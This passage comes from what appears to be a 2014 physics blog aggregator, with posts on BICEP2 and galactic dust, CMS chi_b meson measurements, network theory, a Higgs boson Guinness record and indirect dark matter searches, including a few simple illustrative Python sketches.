The asymmetry may get magnified in exponential processes. Another paradigm that allows the small asymmetry to be "seen" is some precision cancellation. Imagine that the two mirror images of the bromocamphor molecule are "soldiers in two opposing armies" and they destroy each other, one-against-one, in a very exact way (much like in annihilation of matter and antimatter). Then the survivors will come from the "slightly prevailing" version even if the difference was very tiny.

Well, there could also exist reactions where the difference is much higher than in this – arguably random – dissociative anion production. I remain unconvinced. It's plausible that the asymmetries are inevitably linked but I still find it rather unlikely. Just to be sure, if there are no key reactions that are much more sensitive and no important mechanisms where the asymmetry is magnified or accumulated, as mentioned above, I would say that the odds 49.997% and 50.003% may be considered indistinguishable from 50% and 50%: the chances for both lives would be "basically the same".

by Luboš Motl ( at September 29, 2014 06:26 AM

September 28, 2014

Clifford V. Johnson - Asymptotia

Because... Wedding Season. Crumpled bow tie at the end of a long but fun evening on a downtown LA hotel rooftop. -cvj Click to continue reading this post

by Clifford at September 28, 2014 06:02 PM

Clifford V. Johnson - Asymptotia

Dusting off Last Spring’s Excitement
There has been quite a bit of discussion of the realisation that the exciting announcement made by the BICEP2 experiment back in March (see my post here) was based on erroneous analysis. (In brief, various people began to realise that most, if not all, of what they observed could be explained in terms of something more mundane than quantum spacetime fluctuations in the ultra-early universe - the subtle effects of galactic dust. A recent announcement by another experiment, the Planck team, has quantified that a lot.) While there has been a bit of press coverage of the more sober realisations (see a nice June post on NPR's blog here), it is (as with previous such cases) nowhere near as high profile as the initial media blitz of March, for better or worse. I think that "worse" might be the case here, since it is important to communicate to the public (in a healthy way) that science is an ongoing process of discovery, verification, and checking and re-checking by various independent teams and individuals. It is a collective effort, with many voices and the decentralised ever-sceptical scientific process itself, however long it takes, ultimately building and broadening the knowledge base. This self-checking by the community, this reliance on independent confirmation of [...] Click to continue reading this post

by Clifford at September 28, 2014 03:47 PM

John Baez - Azimuth

Network Theory News


You may be wondering, somewhere deep in the back of your mind, what happened to the Network Theory series on this blog. It’s nowhere near done! I plan to revive it, since soon I’ll be teaching a seminar on network theory at U.C. Riverside. It will start in October and go on at least until the end of March.

Here’s a version of the advertisement I sent to the math grad students:

Network Theory Seminar

I’ll be running a seminar on Network Theory on Mondays from 3:10 to 4:30 pm in Surge 268 starting on October 6th.

Network theory uses the tools of modern math—categories, operads and more—to study complex systems made of interacting parts. The idea of this seminar is to start from scratch, explain what my grad students have been doing, and outline new projects that they and other students might want to work on. A lot has happened since I left town in January.

I hope to see you there!

If you want more detail, here is a sketch of what’s been happening.

1) Franciscus Rebro has been working on “cospans”, a very general way to take a physical system with inputs and outputs and treat it as a morphism in a category. This underlies all the other projects.

2) Brendan Fong, a student of mine at Oxford, is working on a category where the morphisms are electrical circuits, and composing morphisms is sticking together circuits:

• Brendan Fong, A compositional approach to control theory.

3) Blake Pollard, a student in the physics department, has been studying Markov processes. In a Markov process, things randomly hop from one vertex of a graph to another along edges. Blake has created a category where morphisms are ‘open’ Markov processes, in which things flow in and out of certain special vertices called ‘terminals’.

4) Jason Erbele has been working on categories in control theory, the branch of math used to study physical systems that interact with the outside world via inputs and outputs. After finishing this paper:

• John Baez and Jason Erbele, Categories in control.

he’s been taking more concepts from control theory and formalizing them using categories.

5) Oh yeah, and what about me? I gave a series of lectures on network theory at Oxford, and you can see videos of them here:

• John Baez, Network Theory.

Jacob Biamonte and I have also more or less finished a book on chemical reaction networks and Petri nets:

• John Baez and Jacob Biamonte, Quantum Techniques for Stochastic Mechanics.

But I won’t be talking about that; I want to talk about the new work my students are doing!
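The Markov processes mentioned in item 3, where "things randomly hop from one vertex of a graph to another along edges", are easy to illustrate with a toy simulation. This is a generic sketch on a hypothetical three-vertex graph, not any specific example from the seminar:

```python
import random

# Toy Markov process: a particle hops along the edges of a triangle graph
# (vertices 0, 1, 2), choosing a neighbouring vertex uniformly at each step.
edges = {0: [1, 2], 1: [0, 2], 2: [0, 1]}

def hop(state, steps, rng):
    """Run the random walk for `steps` hops and return the final vertex."""
    for _ in range(steps):
        state = rng.choice(edges[state])
    return state

rng = random.Random(0)  # fixed seed for reproducibility
counts = [0, 0, 0]
for _ in range(3000):
    counts[hop(0, 50, rng)] += 1
# By symmetry the stationary distribution is uniform, so each count
# should come out near 1000.
print(counts)
```

An "open" Markov process in Blake's sense would additionally let probability flow in and out at designated terminal vertices, so that two such processes can be composed by gluing terminals together.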

by John Baez at September 28, 2014 04:28 AM

September 27, 2014

Michael Schmitt - Collider Blog

CMS resolves states with a mass difference of 19 MeV

This week the CMS Collaboration released a paper reporting the measurement of the ratio of production cross sections for the χb2(1P) and the χb1(1P) heavy meson states (arXiv:1409.5761). The motivation stems from the theoretical difficulties in explaining how such states are formed, but for me as an experimenter the most striking feature of the analysis is the impressive separation of the χ states.

First, a little background. A bottom quark and an anti-bottom anti-quark can form a meson with a well-defined mass. These states bear some resemblance to positronium but the binding potential comes from the strong force, not electromagnetism. In the past, the spectrum of the masses of these states clarified important features of this potential, and led to the view that the potential increases with separation, rather than decreasing. As we all know, QCD is absolutely confining, and the first hints came from studies of charmonium and bottomonium. The masses of these and many other states have been precisely measured over the years, and now provide important tests of lattice calculations.

The mass of the χb2(1P) is 9912.21 MeV and the mass of the χb1(1P) is 9892.78 MeV; the mass difference is only 19.4 MeV. They sit together in a fairly complicated diagram of the states. Here is a nice version which comes from an annual review article by Patrignani, Pedlar and Rosner (arXiv:1212.6552) – I have circled the states under discussion here:

Bottomonium states


So, even on the scale of the bottomonium mesons, this separation of 19 MeV is quite small. Nonetheless, CMS manages to do a remarkably good job. Here is their plot:

Reconstructed chi states


Two peaks are clearly resolved: the χb2(1P) on the left (and represented by the green dashed line) and the χb1(1P) on the right (represented by the red dashed line). The two peaks are successfully differentiated, and the measurements of their relative rates can be carried out.

How do they do it? The χ states decay to the Y(1S) by emitting a photon, with a substantial branching fraction that is already known fairly well. The vector Y(1S) state is rather easily reconstructed through its decays to a μ+μ- pair. The CMS spectrometer is excellent, as is the reconstruction of muons, so the Y(1S) state appears as a narrow peak. By detecting the photon and calculating the μμγ invariant mass, the χ states can be reconstructed.

Here is the interesting part: the photons are not reconstructed with the (rather exquisite) crystal electromagnetic calorimeter, because its energy resolution is not good enough. This may be surprising, since the Higgs decay to a pair of photons certainly is well reconstructed using the calorimeter. These photons, however, have a very low energy, and their energies are not so well measured. (Remember that electromagnetic calorimeter resolution goes roughly as 1/sqrt(E).) Instead, the CMS physicists took advantage of their tracking a second time, and reconstructed those photons that had cleanly converted into an e+e- pair. So the events of interest contained two muons, that together give the Y(1S) state, and an e+e- pair, which gives the photon emitted in the radiative decay of the χ state. The result is the narrow peaks displayed above; the yield is obtained simply by integrating the curves representing the two χ states.
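Stripped of all detector detail, the reconstruction step is just a four-vector sum: combine the two muons and the converted photon and compute the invariant mass. A toy sketch with illustrative numbers (not CMS code):

```python
import math

def inv_mass(particles):
    """Invariant mass of a list of (E, px, py, pz) four-vectors, in GeV."""
    E, px, py, pz = (sum(p[i] for p in particles) for i in range(4))
    return math.sqrt(max(E ** 2 - px ** 2 - py ** 2 - pz ** 2, 0.0))

# Two back-to-back muons carrying the Y(1S) energy (muon masses neglected
# for simplicity) reconstruct to the Y(1S) mass of about 9.46 GeV:
muons = [(4.73, 0.0, 0.0, 4.73), (4.73, 0.0, 0.0, -4.73)]
print(inv_mass(muons))  # → ~9.46
```

Adding the low-energy photon's four-vector to the list then gives the μμγ mass. Since calorimeter resolution degrades roughly as 1/sqrt(E), tracker-measured conversion pairs beat the crystals precisely in this low-photon-energy regime, which is the point of the analysis trick described above.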

This technique might conceivably be interesting when searching for peculiar signals of new physics.

It is difficult to ascertain the reconstruction efficiency of conversion pairs, since they tend to be asymmetric (either the electron or the positron gets most of the photon’s energy). By taking the ratio of yields, however, one obtains the ratio of cross sections times branching fractions. This ratio is experimentally clean, therefore, and robust. The mass spectrum was examined in four bins of the transverse momentum of the Y(1S); the plot above is the second such bin.

Here are the results of the measurement: four values of the ratio σ(χb2)/σ(χb1) plotted as a function of pT(Y):

Ratio of cross sections


LHCb have also made this measurement (arXiv:1202.1080), and their values are presented by the open circles; the CMS measurement agrees well with LHCb. The green horizontal band is simply an average of the CMS values, assuming no dependence on pT(Y). The orange curved band comes from a very recent theoretical calculation by Likhoded, Luchinsky and Poslavsky (arXiv:1409.0693). This calculation does not reproduce the data.

I find it remarkable that the CMS detector (and the other LHC detectors to varying degrees) can resolve such a small mass difference when examining the debris from an 8 TeV collision. These mass scales are different by a factor of two million. While there is no theoretical significance to this fact, it shows that experimenters must and can deal with such a huge range within one single apparatus. And they can.

by Michael Schmitt at September 27, 2014 10:56 PM

ZapperZ - Physics and Physicists

More Editorial On BICEP-2 Results
Anyone following the saga of the BICEP-2 results on the expansion of the early universe will have read many opinion pieces on it. Here is another one from The Economist, and strangely enough, it is quite well-written. Note the emphasis towards the end of the article on how science works:

Rowing back on a triumphant announcement about the first instants of creation may be a little embarrassing, but the saga is a useful reminder of how science works. There is no suggestion that anyone has behaved dishonourably. Admittedly, the BICEP team’s original press conference looks, with hindsight, seriously overconfident. More information-sharing between the various gravitational wave-hunters, all of whom guard their data jealously, might have helped tone down the triumphalism. But science, ideally, proceeds by exactly this sort of good-faith argument and honourable squabbling—until the weight of evidence forces one side to admit defeat.

This is what many in the general public don't fully understand. Reporting something and publishing something are merely the FIRST step in a tedious process of verification. The publication of something in peer-reviewed journals allows others to scrutinize, verify, test, and duplicate the results, often in differing ways. Only when there is independent agreement would something be considered valid or accepted.

How many other fields outside of science have that level of scrutiny and verification process?


by ZapperZ ( at September 27, 2014 02:03 PM

Clifford V. Johnson - Asymptotia

Here We Go Again
Sadly, after a vote today in Parliament, Britain and the USA are officially bombing buddies in the Middle East again. This picture* strikes me as an accurate representation of the relationship. [...] Click to continue reading this post

by Clifford at September 27, 2014 01:18 AM

September 26, 2014

arXiv blog

First Quantum Logic Operation for an Integrated Photonic Chip

The first teleportation of a photon inside a photonic chip illustrates both the potential for quantum computation and the significant challenges that lie ahead.


September 26, 2014 10:32 PM

CERN Bulletin

Ebola virus: recommendations
The CERN Medical Service has been closely following, in particular via the WHO, the development of the Ebola virus outbreak currently affecting some African countries. This infectious disease may be passed on through direct contact with the bodily fluids of a sick person.

Based on the recommendations of the WHO and the two Host States, Switzerland and France, as updated on their respective websites, so far there has been no ban on travel to the countries concerned. However, unless it is absolutely essential, you are advised not to visit any of the countries affected by Ebola (Guinea, Republic of Sierra Leone, Liberia, Nigeria). The two Host States have established an alert system, and a check is carried out on departure from the airports of those countries. It is strongly recommended that you contact the Medical Service if you are travelling to those countries.

We remind you to observe the basic rules of hygiene, such as frequent hand washing, whatever your destination. The Medical Service is at your disposal to help prepare for professional travel by advising on preventive measures relating to your health. Updated information on the CERN Medical Service website:

by CERN Medical Service at September 26, 2014 01:49 PM

Symmetrybreaking - Fermilab/SLAC

CERN gets new Guinness World Records title

The global authority on superlatives celebrates a tiny particle found in a massive machine.

The Higgs boson now holds a seat next to “world’s longest tongue” and “most swords swallowed underwater.” The latest version of the Guinness World Records book recognizes CERN’s discovery of the mass-giving particle.

The typical Guinness World Record has to be measurable and breakable. However, the organization also awards significant milestones for different subjects. The first proof of the existence of the Higgs boson, initially announced in 2012, made major news both within the particle physics community and beyond, prompting two Guinness World Records consultants to suggest including the discovery.

“I think anything we can do to encourage people into science is a good thing,” says Craig Glenday, editor-in-chief of Guinness World Records. “We’re largely a book that celebrates great achievements, so it’s a good way of saying science is great and should be celebrated.”

Glenday said that covering as wide a spectrum of topics as possible is important to the broad appeal of the books and to exposing people to new and interesting information they might not otherwise find. The annual edition, released on September 12 in the United States, also serves as a snapshot of what has happened in the last year. The crazy and fun records lure in readers who return to the book and get small doses of science over time.

“It sort of depresses me that people think Guinness World Records is only fat people and bearded women,” Glenday says. “That’s why it’s really important that we have records like this, because it shows we are prepared to look at the whole scope of what’s happening in the world.”

Glenday and science and technology records manager Sam Mason visited CERN to present the certificate for the Higgs discovery to a delegation including CERN’s director general Rolf-Dieter Heuer and to tour the ATLAS and CMS experiments that discovered the famed particle. The Guinness World Records representatives likened the experience to seeing the pyramids in person for the first time, calling the Large Hadron Collider a “technocathedral” and “an iconic image of science.”

“Each person had such an enthusiasm when they were talking to us about the topic,” Mason says of CERN’s passionate scientists. “They live and breathe particle physics.”

Guinness World Records also presented certificates for other CERN records already recognized in the regularly updated world records database: the largest scientific instrument (the LHC), the highest man-made temperature (5 trillion Kelvin) and the most powerful particle collider.

Tiziano Camporesi, leader of the CMS experiment at the LHC and a member of the receiving committee, says it was satisfying to see a fundamental research result spread to a much wider audience. He called the award “an amusing follow-up to the Higgs discovery.”

Both CERN and Guinness World Records are celebrating their 60th anniversaries this month. 

by Lauren Biron at September 26, 2014 01:00 PM

Jester - Resonaances

BICEP: what was wrong and what was right
As you already know, Planck finally came out of the closet.  The Monday paper shows that the galactic dust polarization fraction in the BICEP window is larger than predicted by pre-Planck models, as previously suggested by an independent theorist's analysis. As a result, the dust contribution to the B-mode power spectrum at moderate multipoles is about 4 times larger than estimated by BICEP. This implies that the dust alone can account for the signal strength reported by BICEP in March this year, without invoking a primordial component from the early universe. See the plot, borrowed from Kyle Helson's twitter, with overlaid BICEP data points and Planck's dust estimates. For a detailed discussion of Planck's paper I recommend reading other blogs who know better than me, see e.g. here or here or here. Instead, I will focus on the sociological and ontological aspects of the affair. There's no question that BICEP screwed up big time. But can we identify precisely which steps led to the downfall, and which were a normal part of the scientific process? The story is complicated and there are many contradicting opinions, so to clarify it I will provide you with simple right or wrong answers :)

  • BICEP Instrument: Right.
    Whatever happened, one should not forget that, at the instrumental level, BICEP was a huge success. The sensitivity to B-mode polarization at angular scales above a degree beats previous CMB experiments by an order of magnitude. Other experiments are following in their tracks, and we should soon obtain better limits on the tensor-to-scalar ratio. (Though it seems BICEP already comes close to the ultimate sensitivity for a single-frequency ground-based experiment, given the dust pollution demonstrated by Planck.)
  • ArXiv first: Right.
    Some complained that the BICEP results were announced before the paper was accepted by a journal. True, peer review is the pillar of science, but that does not mean we have to adhere to obsolete 20th-century standards. The BICEP paper has undergone a thorough peer-review process of the best possible kind, one that included the whole community. It is highly unlikely the error would have been caught by a random journal referee.
  • Press conference: Right.  
    Many considered it inappropriate that the release of the results was turned into a publicity stunt with a press conference, champagne, and YouTube videos. My opinion is that, as long as they believed the signal was robust, they had every right to throw a party, much like CERN did on the occasion of the Higgs discovery. In the end it didn't really matter. Given the importance of the discovery and how news spreads over the blogosphere, the net effect on the public would have been exactly the same if they had just submitted to arXiv.
  • Data scraping: Right.
    There was a lot of indignation about the fact that, to estimate the dust polarization fraction in their field of view, BICEP used preliminary Planck data digitized from a slide in a conference presentation. I don't understand what the problem is. You should always use all publicly available relevant information; it's as simple as that.
  • Inflation spin: Wrong.
    BICEP sold the discovery as the smoking-gun evidence for cosmic inflation. This narrative was picked up by the mainstream press, often mixing up inflation with the big bang scenario. In reality, the primordial B-mode would be yet another piece of evidence for inflation and a measurement of one crucial parameter - the energy density during inflation. That would of course be a huge thing, but apparently not big enough for PR departments. The damage is obvious: now that the result does not stand, the inflation picture and, by association, the whole big bang scenario is undermined in public perception. Now Guth and Linde cannot even dream of a Nobel prize, thanks to BICEP...
  • Quality control: Wrong. 
    Sure, everyone makes mistakes. But, from what I heard, that unfortunate analysis of the dust polarization fraction based on the Planck polarization data was performed by a single collaboration member and never cross-checked. I understand there's been some bad luck involved: the wrong estimate fell very close to the predictions of faulty pre-Planck dust models. But, for dog's sake, the whole Nobel-prize-worthy discovery was hinging on that. There's nothing wrong with being wrong, but not double- and triple-checking crucial elements of the analysis is criminal.
  • Denial: Wrong.
    The error in the estimate of the dust polarization fraction was understood soon after the initial announcement, and BICEP leaders  were aware of it. Instead of biting the bullet, they chose a we-stand-by-our-results story. This resembled a child sweeping a broken vase under the sofa in the hope that no one would notice...  

To conclude, BICEP goofed it up and deserves ridicule, in the same way a person slipping on a banana skin does. With some minimal precautions the mishap could have been avoided, or at least the damage could have been reduced. On the positive side, science worked once again, and  we all learned something. Astrophysicists learned some exciting stuff about polarized dust in our galaxy. The public learned that science can get it wrong at times but is always self-correcting. And Andrei Linde learned to not open the door to a stranger with a backpack.

by Jester ( at September 26, 2014 09:00 AM

September 25, 2014

Quantum Diaries

Dark Skies II: Indirect Detection and The Quest for the Smoking Gun

Dark matter is a tough thing to study. There is no getting around it: any strategy we can come up with to look for these invisible mystery particles must hinge on the sneaky little creatures interacting in some way with ordinary Standard Model particles. Otherwise we haven’t got even the slightest chance of seeing them.

One of the most popular classes of dark matter candidates is the Weakly Interacting Massive Particles (WIMPs), so called because they do not interact electromagnetically, only weakly, with ordinary matter. In direct detection we look for WIMPs that interact by scattering off of a Standard Model particle. In contrast, indirect detection looks for interactions in which a dark matter particle (either a WIMP or a non-WIMP — it doesn’t matter) annihilates with another dark matter particle or decays on its own into Standard Model particles. We have a good chance of detecting these Standard Model end products if we can just get our backgrounds low enough. In my last post, “Dark Skies: A Very Brief Guide to Indirect Detection,” I gave a more detailed look at the kinds of annihilation and decay products that we might expect from such a process and spoke briefly about some of the considerations that must go into a search for particles from these annihilation and decay processes. Today I will highlight three of the indirect detection experiments currently attacking the dark matter problem.



The Alpha Magnetic Spectrometer (AMS-02) is a large indirect detection experiment situated on the International Space Station. I am especially excited to talk to you about this experiment because just a couple of days ago AMS-02 released a very interesting result. Although I include a link to the press release and the relevant papers below, I intend to give away the punchline by summarizing here everything I know about the AMS-02 experiment and their result from this past week.


Fig. 1: (Left) A 3D rendering of the AMS-02 detector, from the AMS-02 group website. (Right) A schematic of the AMS-02 detector showing all of its various subsystems [1].

First, let’s talk about the design of the experiment (Fig. 1). As the infamous Shrek once said, ogres are like onions. Well, most big particle physics experiments are like onions too. They consist of many layers of detectors interspersed with different kinds of shielding – the quintessential example being big collider experiments like ATLAS and CMS at the Large Hadron Collider. AMS-02 has just as many layers and almost as much complexity to it as something like ATLAS. In no particular order, these layers are:

  • A donut-shaped superconducting magnet surrounding most of the AMS-02 detector. Any particles traversing through the hole in the donut will be deflected by the magnet, and particles of different charges are deflected in different directions. The magnet therefore is an effective way to separate positrons from electrons, positive ions from negative ones, and antimatter from ordinary matter.
  • Veto or anticoincidence counters (ACCs) that lie just inside the superconducting magnet. The ACCs tag any particle that enters the detector through the side rather than the hole in the magnet, thus allowing the AMS-02 to reject particle events that do not have well-understood trajectories.
  • A Transition Radiation Detector (TRD) consisting of twenty layers of material that provide discrimination between extremely high-energy leptons (positrons, electrons) and hadrons (protons, etc.) that are traveling near the speed of light. Each time an electron or positron passes through the TRD, it produces a shower of x-rays as it crosses the interface between layers, but a proton or other hadron does not.
  • The Time of Flight (ToF) system, which consists of four layers of scintillation counters, two above and two below the detector, that measure the time it takes for a particle to traverse the detector and also serve as a trigger system, indicating to the other subsystems that a particle has entered the detector.
  • The tracker, which consists of eight layers of double-sided silicon sensors that record the path of any particle that enters the detector through the magnet. By the time a particle has reached the tracker, the magnet has already done half the work by separating positively-charged from negatively-charged particles. By looking at the trajectory of each particle inside the tracker, the AMS-02 can not only determine which particles are positive and negative but also the atomic number Z of any nucleus that enters the detector, hence the “Spectrometer” part of “Alpha Magnetic Spectrometer.”
  • A Ring Imaging Cherenkov detector (RICH) which measures particle velocities by looking at the shape of the Cherenkov radiation that is produced by incident particles.
  • An electromagnetic calorimeter (ECAL) consisting of a dense piece of material inside which incident particles produce secondary showers of particles. By looking at these particle showers, the ECAL helps to discriminate between leptons (electrons, positrons, gammas) and hadrons (e.g. protons) that, if they have the same trajectory through the magnet, might otherwise be impossible to tell apart.
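As a rough illustration of the spectrometer principle described above: the bending radius of a track fixes the particle's rigidity (momentum per unit charge), while the bending direction fixes the charge sign. A minimal sketch with illustrative field and rigidity values (not actual AMS-02 parameters):

```python
# Toy magnetic spectrometer: a particle of rigidity R (in GV) in a field
# B (in tesla) bends with radius r[m] = R[GV] * 1e9 / (3e8 * B[T]).
# All numbers are illustrative, not AMS-02 specifications.

def bending_radius_m(rigidity_gv, b_tesla):
    """Radius of curvature for a particle of given rigidity in field B."""
    return rigidity_gv * 1e9 / (3.0e8 * b_tesla)

def charge_sign(curvature):
    """Opposite curvature senses distinguish e.g. positrons from electrons."""
    return +1 if curvature > 0 else -1

# A 10 GV proton and a 10 GV antiproton in a 0.15 T field bend with the
# same radius but in opposite senses:
r = bending_radius_m(10.0, 0.15)
print(f"bending radius: {r:.1f} m")
print("proton:", charge_sign(+1.0 / r), " antiproton:", charge_sign(-1.0 / r))
```

The radius is huge compared to the detector, which is why the tracker measures only the tiny sagitta of the track rather than a full circle.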

Although it sounds complicated, the combined power of all these various subdetectors allows AMS-02 to do a spectacular job of characterizing many different types of particles. Here, the particles relevant to dark matter detection are antimatter particles such as positrons, antiprotons, and antideuterons. In the absence of exotic processes, we expect the spectra of these particles to be smoothly decreasing, isotropic, and generally well-behaved. Any bumps or features in, say, the positron or antiproton spectra would indicate some new process at work - like, possibly, WIMP annihilations [2].


Fig. 2: The first positron fraction measurement produced by the AMS-02 collaboration, released in April 2013 [3].

Back in April 2013, AMS-02 released its first measurement of the fraction of positrons as compared to electrons in cosmic rays (Fig. 2). Clearly the curve in Fig. 2 is not decreasing – there is some other source of positrons at work here. There was some speculation among the scientific community that the rise in positron fraction at higher energies could be attributed to dark matter annihilations, but the general consensus was that this shape is caused by a more ordinary astrophysical source such as pulsars. So in general, how do you tell what kind of positron source could cause this shape of curve? The answer is this: if the rise in positron fraction is due to dark matter annihilations, you can expect to see a very sharp dropoff at higher energies. A less exotic astrophysical source would result in a smooth flattening of this curve at higher energies [3].
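The two scenarios can be caricatured with toy spectral shapes (purely illustrative functions, not fits to the AMS-02 data): a dark matter source cuts off sharply at the WIMP mass, while a pulsar-like source rolls over smoothly.

```python
import math

# Toy positron-fraction shapes, for illustration only (not AMS-02 fits).
# A DM-annihilation source cannot produce positrons above the WIMP mass,
# so its contribution cuts off sharply; an astrophysical source such as
# pulsars flattens smoothly instead.

def dm_like(e_gev, m_wimp=350.0):
    """Rising fraction with a hard cutoff at the (hypothetical) WIMP mass."""
    return 0.05 + 0.10 * (e_gev / m_wimp) if e_gev < m_wimp else 0.0

def pulsar_like(e_gev, e0=200.0):
    """Rising fraction that rolls over smoothly at high energy."""
    return 0.05 + 0.10 * (1.0 - math.exp(-e_gev / e0))

for e in (100.0, 300.0, 500.0):
    print(e, round(dm_like(e), 3), round(pulsar_like(e), 3))
```

Distinguishing the hard cutoff from the smooth rollover at the highest energies is exactly where the statistics run out in the 2014 data.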


Fig. 3: An updated positron fraction measurement from two years’ worth of data released by the AMS-02 collaboration on September 18, 2014 [4].

On September 18, 2014, AMS-02 released a followup to its 2013 result covering a larger range of energies in order to further investigate this positron excess (Fig. 3). The positron fraction curve does in fact begin to drop off at higher energies. Is it a smoking-gun signal of WIMP annihilations? Not yet – there are not enough statistics at high energies to differentiate between a smooth turnover and an abrupt drop in positron fraction. For now, AMS-02 plans to investigate the positron flux at even higher energies to determine the nature of this turnover and to do a similar measurement with the antiproton fraction as compared to regular protons.

For a webcast of the official press release, you can go here. Or, to read about the AMS-02 results in more detail, check out the references [1] and [4] at the bottom of this article.




Fig. 4: A view of the gamma-ray sky from the Fermi-LAT instrument. The bright line is the galactic plane.

The Fermi Large Area Telescope (LAT) is another indirect detection experiment that has seen hints of something interesting. In this particular experiment, the signal of interest comes from gamma rays of energies ranging from tens of MeVs to more than 300 GeV. The science goals are to study and catalog localized gamma-ray sources, to investigate the diffuse gamma-ray background in our part of the universe, and to search for gamma rays resulting from new physics processes, such as dark matter annihilations.

Because the Earth’s atmosphere is not transparent to gamma rays, our best chance to study them lies out in space. The Fermi-LAT is a very large space-based observatory which detects gammas through a mechanism called pair conversion, in which a high-energy photon, rather than being reflected or refracted upon entering a medium, converts into an electron-positron pair. Inside the LAT, this conversion takes place inside a tracker module in one of several thin-yet-very-dense layers of tungsten. There are sixteen of these conversion layers total, interleaved with eighteen layers of silicon strip detectors that record the x- and y-positions of any tracks produced by the electron-positron pair. Beneath the tracker modules is a calorimeter, consisting of a set of CsI modules that absorb the full energy of the electrons and positrons and therefore give us a good measure of the energy of the original gamma ray. Finally, the entire detector is covered by an anticoincidence detector (ACD) consisting of plastic scintillator tiles that scintillate when charged particles pass through them but not when gamma rays pass through, thereby providing a way to discriminate the signal of interest from cosmic ray backgrounds (Fig. 5).


Fig. 5: (Left) A 3D rendering of the Fermi spacecraft deployed above the Earth. (Right) A design schematic of the Fermi-LAT instrument.

One of the nice things about the Fermi telescope is that it not only has a wide field of view and continually scans across the entire sky, but it can also be pointed at specific locations. Let’s consider for a moment some of the places we could point the Fermi-LAT if we are hoping to detect a dark matter signal [6].

  • The probability of dark matter annihilations taking place is highest in regions of high density like our galactic center, but there is a huge gamma-ray background to contend with from many different astrophysical sources. If we look further out into our galactic halo, there will be less background, but also fewer events for our signal of interest. And there is still a diffuse gamma-ray background to contend with. However, a very narrow peak in the gamma spectrum that is present across the entire sky and not associated with any one particular localized astrophysical source would be very suggestive of a dark matter signal – exactly the kind of smoking gun we are looking for.
  • We could also look at other galaxies. Certain kinds of galaxies called dwarf spheroidals are particularly promising for a number of reasons. First of all, the Milky Way has several close dwarf neighbors, so there are plenty to choose from. Second, dwarf galaxies are very dim. They have few stars, very little gas, and few gamma-ray sources like pulsars or supernova remnants. Should a gamma signal be seen across several of these dwarf galaxies, it would be very hard to explain by any means other than dark matter annihilation.
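The "narrow line over a smooth background" strategy from the first bullet can be sketched crudely: integrate an assumed power-law background over a narrow energy window around the candidate line, and compare any excess counts against the square root of the background. All numbers here (normalization, spectral index, excess) are invented for illustration; the real Fermi analysis is a full likelihood fit.

```python
import math

# Toy line search: count events expected from a smooth background in a
# narrow energy window around a candidate line, then estimate how
# significant a given excess would be as s / sqrt(b). This is a crude
# counting estimate with made-up numbers, not Fermi's likelihood analysis.

def powerlaw_background(e, norm=1e6, index=2.4):
    """Smooth diffuse background, dN/dE ~ E^-index (arbitrary units)."""
    return norm * e ** (-index)

def window_counts(spectrum, e_line, half_width, step=0.1):
    """Riemann-sum integral of a spectrum over [e_line - hw, e_line + hw]."""
    e, total = e_line - half_width, 0.0
    while e < e_line + half_width:
        total += spectrum(e) * step
        e += step
    return total

b = window_counts(powerlaw_background, 130.0, 5.0)   # hypothetical 130 GeV line
s = 12.0                                             # hypothetical excess counts
print(f"background = {b:.1f}, significance ~ {s / math.sqrt(b):.1f} sigma")
```

The same excess looks dramatic or marginal depending on the background model, which is why the claimed significance of the 130 GeV feature moved around so much between analyses.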

In spring 2012, two papers came out one after another suggesting that a sharp gamma peak had indeed been found near the galactic center, which you can see in Fig. 6 [7, 8]. What is the cause of this feature? Was it some kind of instrumental effect? A statistical fluctuation? Was it the dark matter smoking gun? The Fermi-LAT team officially commented on these papers later that November, reporting a feature that was much less statistically significant, much closer to 135 GeV, and consistent with gamma rays produced by cosmic rays in the earth’s atmosphere [9].


Fig. 6: The gamma-ray spectrum reported by Fermi in 2012, produced from three years of data [7]. The black points show the number of counts observed in each energy bin.  The green markers represent the best-fit background-only model, the red markers represent the best-fit background + WIMP annihilation model, and the blue dots represent the best-fit WIMP annihilation model with the background subtracted off. The bottom panel shows the residual.

This gamma line has been an active target of study since 2012. In 2013, the Fermi-LAT group released a further investigation of this feature using over 3.7 years of data. A bump in the spectrum at about 133 GeV was again observed, consistent with the 2012 papers, but with decreased statistical significance in part because this feature was narrower than the energy resolution of the LAT and because a similar (yet smaller) feature was seen in the earth’s “limb”, or outermost edges of the atmosphere [10]. The hypothesis that this bump in the gamma-ray spectrum is a WIMP signal has all but fallen out of favor within the scientific community.

In the meantime, Fermi-LAT has also been looking for gamma rays from nearby dwarf galaxies. A survey of 25 dwarf galaxies near the Milky Way yielded no such statistically-significant signal [11]. For the next few years, Fermi will continue its search for dark matter as well as continuing to catalog and investigate other astrophysical gamma-ray sources.




Fig. 7: Members of the IceCube collaboration.

Last but certainly not least, I wanted to discuss one of my particular favorite experiments. IceCube is really cool for many reasons, not the least of which is because it is situated at the South Pole! Like LUX (my home experiment), IceCube consists of a large array of light sensors (photomultiplier tubes) that look for flashes of light indicating particle interactions within a large passive target. Unlike LUX, however, the target medium in IceCube is the Antarctic ice itself, which sounds absolutely fantastical until you consider the following: if you go deep enough, the ice is extremely clear and uniform, because the pressure prevents bubble formation, and it is also very dark down there, so that any flashes of light inside the ice stand out.

In IceCube, neutrinos are the main particles of interest. They are the ninjas of the particle physics world – neutrinos interact only very rarely with other particles and are actually rather difficult to detect. However, when your entire detector consists of a giant chunk of ice 2.5 kilometers deep, that’s a lot of material, resulting in a not-insignificant probability that a passing neutrino will interact with an atom inside your detector. A neutrino interacting with the ice will produce a shower of secondary charged particles, which in turn produce Cherenkov radiation that can be detected. Neutrinos themselves are pretty awesome on their own, and there is a wealth of interesting neutrino research currently taking place. They can also tell us a lot about a variety of astrophysical entities such as gamma-ray bursts and supernovae. And even more importantly for this article, neutrinos can occur as a result of dark matter annihilations.

Unfortunately for the dark matter search, muons and neutrinos produced by cosmic ray interactions in the atmosphere are a major source of background in the detector. Muons are quite penetrating and can travel long distances in most materials, so atmospheric muons from above can easily reach the detector. Luckily, they don't travel nearly as far as neutrinos: no muon can make it through thousands of kilometers of rock. Neutrinos travel vastly further, so a good way to discriminate between cosmic-ray muons and neutrinos is to eliminate any downwards-traveling particles. Any upwards-traveling particle tracks must be from neutrinos, because only neutrinos can traverse the entire diameter of the Earth without getting stopped somewhere in the ground. To put it more succinctly: IceCube makes use of the entire Earth as a shield against backgrounds! Atmospheric neutrinos are a little more difficult to distinguish from the astrophysical neutrinos relevant to dark matter searches, but are nevertheless an active target of study and are becoming increasingly well understood.
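A toy version of this up-going/down-going selection, with invented events, just to make the geometry concrete (a zenith angle greater than 90 degrees means the track came up through the Earth):

```python
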